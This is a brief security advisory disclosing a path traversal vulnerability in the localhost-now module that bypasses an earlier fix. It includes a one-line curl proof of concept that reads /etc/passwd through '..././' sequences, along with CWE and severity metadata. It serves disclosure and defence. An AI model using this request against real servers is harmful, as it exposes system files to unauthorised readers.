All versions of localhost-now are vulnerable to path traversal. This vulnerability is a bypass to the path traversal fix introduced in version 1.0.2
Proof of concept:
$ curl -v --path-as-is "http://IP:5432/..././..././..././..././..././..././..././..././..././..././etc/passwd"
No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.
{
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2019-06-11T16:40:34Z",
"nvd_published_at": null,
"severity": "HIGH"
}